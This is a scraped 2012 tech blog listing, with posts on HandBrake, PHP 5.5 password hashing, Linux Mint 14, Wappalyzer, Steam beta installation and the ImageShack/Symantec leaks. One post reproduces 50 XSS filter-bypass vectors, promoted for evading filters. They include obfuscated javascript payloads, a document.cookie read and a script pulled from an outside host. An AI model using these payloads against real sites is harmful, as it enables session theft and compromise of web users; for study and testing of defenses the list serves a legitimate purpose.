Friday, 23 November 2012
Video Transcoding With HandBrake In Linux
HandBrake is a GPL-licensed, multiplatform, multithreaded video transcoder available for major platforms: linux, mac, and windows. HandBrake converts video from nearly any format to a handful of modern ones.
Handbrake can save output in two containers, MP4 and MKV and I've been using it as a MKV transcoder for a while and I'm quite satisfied with it. Even though the official wiki says its not a ripper, I can see it to be quite useful DVD ripper.
Handbrake is available in CLI (HandBrakeCLI) and GUI (ghb) mode. Hence this offers the flexibility to choose the appropriate version according to your linux personality. As of now, we can install HandBrake from PPA and the latest version is v. 0.9.8 released back in July this year.
HandBrake can be installed from PPA. Issue the following commands in your terminal
Or if you wish to install the GUI version, type:
I recommend using the CLI version since you can transcode/convert videos much more efficiently if you use the CLI version. But if you are not comfortable with the command line interfaces, the GUI version of HandBrake is also quite good.
Only problem I have felt is the naming convention of the commands for both the GUI and CLI versions of the tool. In order to run two versions of this tool, you need to type HandBrakeCLI for CLI version and ghb for the GUI version. The problem here is with the naming convention for the binaries. I mean, the names handbrake-cli and handbrake-gtk would be more straightforward than these badly chosen names. Otherwise, the tool does pretty good job of video conversion and can be good alternative if you are not comfortable with ffmpeg. Note that ffmpeg is also capable of video conversions of different formats and is a great tool. :)
Read more...
Handbrake can save output in two containers, MP4 and MKV and I've been using it as a MKV transcoder for a while and I'm quite satisfied with it. Even though the official wiki says its not a ripper, I can see it to be quite useful DVD ripper.
Handbrake is available in CLI (HandBrakeCLI) and GUI (ghb) mode. Hence this offers the flexibility to choose the appropriate version according to your linux personality. As of now, we can install HandBrake from PPA and the latest version is v. 0.9.8 released back in July this year.
HandBrake can be installed from PPA. Issue the following commands in your terminal
$ sudo add-apt-repository ppa:stebbins/handbrake-releases
$ sudo apt-get update
$ sudo apt-get install handbrake-cli
$ sudo apt-get update
$ sudo apt-get install handbrake-cli
Or if you wish to install the GUI version, type:
$ sudo apt-get install handbrake-gtk
I recommend using the CLI version since you can transcode/convert videos much more efficiently if you use the CLI version. But if you are not comfortable with the command line interfaces, the GUI version of HandBrake is also quite good.
Only problem I have felt is the naming convention of the commands for both the GUI and CLI versions of the tool. In order to run two versions of this tool, you need to type HandBrakeCLI for CLI version and ghb for the GUI version. The problem here is with the naming convention for the binaries. I mean, the names handbrake-cli and handbrake-gtk would be more straightforward than these badly chosen names. Otherwise, the tool does pretty good job of video conversion and can be good alternative if you are not comfortable with ffmpeg. Note that ffmpeg is also capable of video conversions of different formats and is a great tool. :)
Read more...
Video Transcoding With HandBrake In Linux
2012-11-23T22:43:00+05:45
Cool Samar
conversion tools|fedora|linux|linuxmint|tricks and tips|ubuntu|ubuntu 11.10|ubuntu 12.04|ubuntu 12.10|video|
Comments
Labels:
conversion tools,
fedora,
linux,
linuxmint,
tricks and tips,
ubuntu,
ubuntu 11.10,
ubuntu 12.04,
ubuntu 12.10,
video
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Monday, 19 November 2012
50 Awesome XSS Vectors From @soaj1664ashar
Here are 50 awesome XSS vectors that @soaj1664ashar has been tweeting over time. Can be quite useful for bypassing any filter with the help of these full baked vectors.
Or Grab from pastebin :)
Read more...
50 awesome XSS vectors that I have tweeted (@soaj1664ashar) over time. Enjoy! Now you can bypass any filter with the help of these full baked vectors :-) 1) <a href="javascript:\u0061le%72t(1)"><button> 2) <div onmouseover='alert(1)'>DIV</div> 3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> 4) <a href="jAvAsCrIpT:alert(1)">X</a> 5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> 6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> 7) <var onmouseover="prompt(1)">On Mouse Over</var> 8) <a href=javascript:alert(document.cookie)>Click Here</a> 9) <img src="/" =_=" title="onerror='prompt(1)'"> 10) <%<!--'%><script>alert(1);</script --> 11) <script src="data:text/javascript,alert(1)"></script> 12) <iframe/src \/\/onload = prompt(1) 13) <iframe/onreadystatechange=alert(1) 14) <svg/onload=alert(1) 15) <input value=<><iframe/src=javascript:confirm(1) 16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div> 17) http://www.<script>alert(1)</script .com 18) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> 19) <svg><script ?>alert(1) 20) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> 21) <img src=`xx:xx`onerror=alert(1)> 22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> 23) <meta http-equiv="refresh" content="0;javascript:alert(1)"/> 24) <math><a xlink:href="//jsfiddle.net/t846h/">click 25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> 26) <svg contentScriptType=text/vbs><script>MsgBox+1 27) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a 28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> 29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ 30) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F 31) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script 32) <object data=javascript:\u0061le%72t(1)> 33) <script>+-+-1-+-+alert(1)</script> 34) <body/onload=<!-->
alert(1)> 35) <script itworksinallbrowsers>/*<script* */alert(1)</script 36) <img src ?itworksonchrome?\/onerror = alert(1) 37) <svg><script>//
confirm(1);</script </svg> 38) <svg><script onlypossibleinopera:-)> alert(1) 39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe 40) <script x> alert(1) </script 1=2 41) <div/onmouseover='alert(1)'> style="x:"> 42) <--`<img/src=` onerror=alert(1)> --!> 43) <script/src=data:text/javascript,alert(1)></script> 44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> 45) "><img src=x onerror=window.open('https://www.google.com/');> 46) <form><button formaction=javascript:alert(1)>CLICKME 47) <math><a xlink:href="//jsfiddle.net/t846h/">click 48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> 49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> 50) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
Or Grab from pastebin :)
Read more...
50 Awesome XSS Vectors From @soaj1664ashar
2012-11-19T16:38:00+05:45
Cool Samar
cross site scripting|hacking|web|xss|
Comments
Labels:
cross site scripting,
hacking,
web,
xss
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
PHP 5.5 To Include Simple And Secure Password Hashing API
Few days ago, we saw the release of PHP 5.5.0 Alpha 1 to the public. The PHP development team is serious about addressing all the criticism it gets time and again. With the recent leaks of several high profile sites, a simple to use yet secure password hashing API has been introduced now.
Here's the RFC for simple password hashing API proposed by ircmaxell and now it has been implemented as a PHP core in 5.5.0 Alpha 1 release and will continue to be part of the PHP core in future releases.
In case you would like to use the API functions in older releases, there's a compatible PHP library for PHP >= 5.3.7. The reason for this is that PHP prior to 5.3.7 contains a security issue with its BCRYPT implementation.
Basically the idea behind simple password hashing API is that most of the PHP developers either don't understand or don't think worth the effort the whole concept of strong password hashing. By providing a simple API that can be called, which takes care of all of those issues for you, hopefully more projects and developers will be able to use secure password hashing.
Using the API is quite simple. All you have to do to get the hash is:
Verifying the password is also quite simple.
The simple password hashing API provides sets of password_* functions for the developers to make use of strong password hashing.
RFC for simple password hashing API
Designing an API
PHP 5.5.0 Alpha 1 released
Read more...
Here's the RFC for simple password hashing API proposed by ircmaxell and now it has been implemented as a PHP core in 5.5.0 Alpha 1 release and will continue to be part of the PHP core in future releases.
In case you would like to use the API functions in older releases, there's a compatible PHP library for PHP >= 5.3.7. The reason for this is that PHP prior to 5.3.7 contains a security issue with its BCRYPT implementation.
Basically the idea behind simple password hashing API is that most of the PHP developers either don't understand or don't think worth the effort the whole concept of strong password hashing. By providing a simple API that can be called, which takes care of all of those issues for you, hopefully more projects and developers will be able to use secure password hashing.
Using the API is quite simple. All you have to do to get the hash is:
$hash = password_hash($password, PASSWORD_BCRYPT);
Verifying the password is also quite simple.
if (password_verify($password, $hash)) { // pass is correct :) } else { // pass is correct :/ }
The simple password hashing API provides sets of password_* functions for the developers to make use of strong password hashing.
Reading materials
RFC for simple password hashing API
Designing an API
PHP 5.5.0 Alpha 1 released
Read more...
PHP 5.5 To Include Simple And Secure Password Hashing API
2012-11-19T14:49:00+05:45
Cool Samar
development|hashing|password hacking|php|programming|security|web|
Comments
Labels:
development,
hashing,
password hacking,
php,
programming,
security,
web
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
How To View Someone's IP and Speed - Epic
Well wanna laugh the whole day? Then, check out the video I found today on google. Don't even try to hold your laugh while watching this video because that's gonna cause a serious mental disorder :P.
Before starting, I would suggest you to read Wikipedia entry about traceroute if you don't know about traceroute(Believe me if you understand english, you'll get what it is).
Myself, been laughing the whole day. :P
Read more...
Myself, been laughing the whole day. :P
Read more...
How To View Someone's IP and Speed - Epic
2012-11-19T00:04:00+05:45
Cool Samar
computer jokes|fun|hacking|video|youtube|
Comments
Labels:
computer jokes,
fun,
hacking,
video,
youtube
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Tuesday, 13 November 2012
Linux Mint 14 "Nadia" RC Released
After 6 months of incremental development on top of stable and reliable technologies such as MATE, Cinnamon and MDM, Linux Mint 14 codenamed "Nadia" RC is available for download.
For the first time since Linux Mint 11, the development team was able to capitalize on upstream technology which works and fits its goals. After 6 months of incremental development, Linux Mint 14 features an impressive list of improvements, increased stability and a refined desktop experience. This new release comes with updated software and brings refinements and new features to make your desktop even more comfortable to use. Linux Mint 14 "Nadia" is based upon the Ubuntu 12.10 "Quantal Quetzal".
The download links (torrents and direct both) are available at this blog post.
Useful Links
Download Nadia
Nadia release notes
Whats New in Nadia
Read more...
For the first time since Linux Mint 11, the development team was able to capitalize on upstream technology which works and fits its goals. After 6 months of incremental development, Linux Mint 14 features an impressive list of improvements, increased stability and a refined desktop experience. This new release comes with updated software and brings refinements and new features to make your desktop even more comfortable to use. Linux Mint 14 "Nadia" is based upon the Ubuntu 12.10 "Quantal Quetzal".
The download links (torrents and direct both) are available at this blog post.
Useful Links
Download Nadia
Nadia release notes
Whats New in Nadia
Read more...
Linux Mint 14 "Nadia" RC Released
2012-11-13T17:56:00+05:45
Cool Samar
linux|linuxmint|news|quantal quetzal|ubuntu 12.10|
Comments
Labels:
linux,
linuxmint,
news,
quantal quetzal,
ubuntu 12.10
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Sunday, 11 November 2012
Wappalyzer - Browser Extension To Identify Web Servers
Wappalyzer is a very useful browser extension that reveals the web technologies and server softwares used behind to empower any webpage. This extension identifies different CMS, e-commerce portals, blogging platforms, web servers, frameworks, analytic tools, etc.
This very useful browser extension is available for Mozilla Firefox and Google Chrome. It is quite useful in server fingerprinting and identification steps. Wappalyzer tracks and detects several hundred applications under several categories.
Wappalyzer for Mozilla Firefox
Wappalyzer for Google Chrome
Wappalyzer @ GitHub
Once you install the addon and reload the browser, you will see the icons for identified applications on the right side of address bar (near to the bookmark & reload icon) in Mozilla Firefox. You can click in that area for more details.
One particular setting you would like to disable is the tracking and gathering of anonymous data which is *said* to be used for research purposes. You can turn off the tracking by going to the addon's preference page. Screenshot below shows the preference page in Mozilla Firefox.
Read more...
This very useful browser extension is available for Mozilla Firefox and Google Chrome. It is quite useful in server fingerprinting and identification steps. Wappalyzer tracks and detects several hundred applications under several categories.
Wappalyzer for Mozilla Firefox
Wappalyzer for Google Chrome
Wappalyzer @ GitHub
Once you install the addon and reload the browser, you will see the icons for identified applications on the right side of address bar (near to the bookmark & reload icon) in Mozilla Firefox. You can click in that area for more details.
One particular setting you would like to disable is the tracking and gathering of anonymous data which is *said* to be used for research purposes. You can turn off the tracking by going to the addon's preference page. Screenshot below shows the preference page in Mozilla Firefox.
Read more...
Wappalyzer - Browser Extension To Identify Web Servers
2012-11-11T23:00:00+05:45
Cool Samar
browser|browser addons|fingerprinting|mozilla firefox|tricks and tips|useful website|web|
Comments
Labels:
browser,
browser addons,
fingerprinting,
mozilla firefox,
tricks and tips,
useful website,
web
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Wednesday, 7 November 2012
Steam Beta For Linux Released, Use Steam Beta Right Now
Finally the steam beta was released today and is ready for beta testing by the selected 1000 beta testers who were chosen through the Steam For Linux Beta Survey. This post also provides the steps for using steam beta for other users who were not selected.
Don't worry if you were not lucky enough to get a Beta account in Steam for linux survey. Some of the Reddit users have found a way around this and non-beta account holder can use steam for linux beta.
The post from Valve Software writes:
The Valve Linux team is proud to announce the launch of a limited access beta for its new Steam for Linux client.
The Steam for Linux Beta client supports the free-to-play game Team Fortress 2. Approximately two dozen additional Steam titles are now also available for play on Ubuntu. Additionally, the Steam for Linux Beta client includes Big Picture, the mode of Steam designed for use with a TV and controller, also currently in beta.
Below are the steps you should follow in order to use steam beta in your linux. First, type the following commands in the terminal:
The steam installer will then download and update the data for steam client. Once the update is finished, launch the steam from Unity dash and then login to your steam account (or create one). Close your steam client and then type the followin in terminal or just update your shortcut with following shortcut:
Enjoy steam in your linux :)
Read more...
Don't worry if you were not lucky enough to get a Beta account in Steam for linux survey. Some of the Reddit users have found a way around this and non-beta account holder can use steam for linux beta.
The post from Valve Software writes:
The Valve Linux team is proud to announce the launch of a limited access beta for its new Steam for Linux client.
The Steam for Linux Beta client supports the free-to-play game Team Fortress 2. Approximately two dozen additional Steam titles are now also available for play on Ubuntu. Additionally, the Steam for Linux Beta client includes Big Picture, the mode of Steam designed for use with a TV and controller, also currently in beta.
Below are the steps you should follow in order to use steam beta in your linux. First, type the following commands in the terminal:
samar@samar-Techgaun:~$ sudo apt-get install libopenal1
samar@samar-Techgaun:~$ wget http://media.steampowered.com/client/installer/steam.deb && sudo dpkg -i steam.deb
samar@samar-Techgaun:~$ wget http://media.steampowered.com/client/installer/steam.deb && sudo dpkg -i steam.deb
The steam installer will then download and update the data for steam client. Once the update is finished, launch the steam from Unity dash and then login to your steam account (or create one). Close your steam client and then type the followin in terminal or just update your shortcut with following shortcut:
steam steam://open/games
Enjoy steam in your linux :)
Read more...
Steam Beta For Linux Released, Use Steam Beta Right Now
2012-11-07T23:56:00+05:45
Cool Samar
news|steam|
Comments
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Monday, 5 November 2012
ImageShack and Symantec Hacked And Dumped
2012 has been a year of leaks and hacks and continues to be so. Hackers hacked into ImageShack and Symantec servers and have leaked several critical information regarding the servers and employees.
Hackers have disclosed in an e-zine that the security practices of these major companies have been a joke: In case of ImageShack, all MySQL instances as root, really old (2008) kernels, hardcode database passwords, enable register_globals, etc.
The e-zine says:
ImageShack has been completely owned, from the ground up. We have had root and physical control of every server and router they own.
Likewise, they have dumped the database of Symantec, one of the leading AV companies which includes the critical information of the researchers at Symantec.
Links
Pastebin
AnonPaste
Read more...
Hackers have disclosed in an e-zine that the security practices of these major companies have been a joke: In case of ImageShack, all MySQL instances as root, really old (2008) kernels, hardcode database passwords, enable register_globals, etc.
The e-zine says:
ImageShack has been completely owned, from the ground up. We have had root and physical control of every server and router they own.
Likewise, they have dumped the database of Symantec, one of the leading AV companies which includes the critical information of the researchers at Symantec.
Links
Pastebin
AnonPaste
Read more...
ImageShack and Symantec Hacked And Dumped
2012-11-05T09:06:00+05:45
Cool Samar
hacking|internet|news|
Comments
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Subscribe to:
Posts (Atom)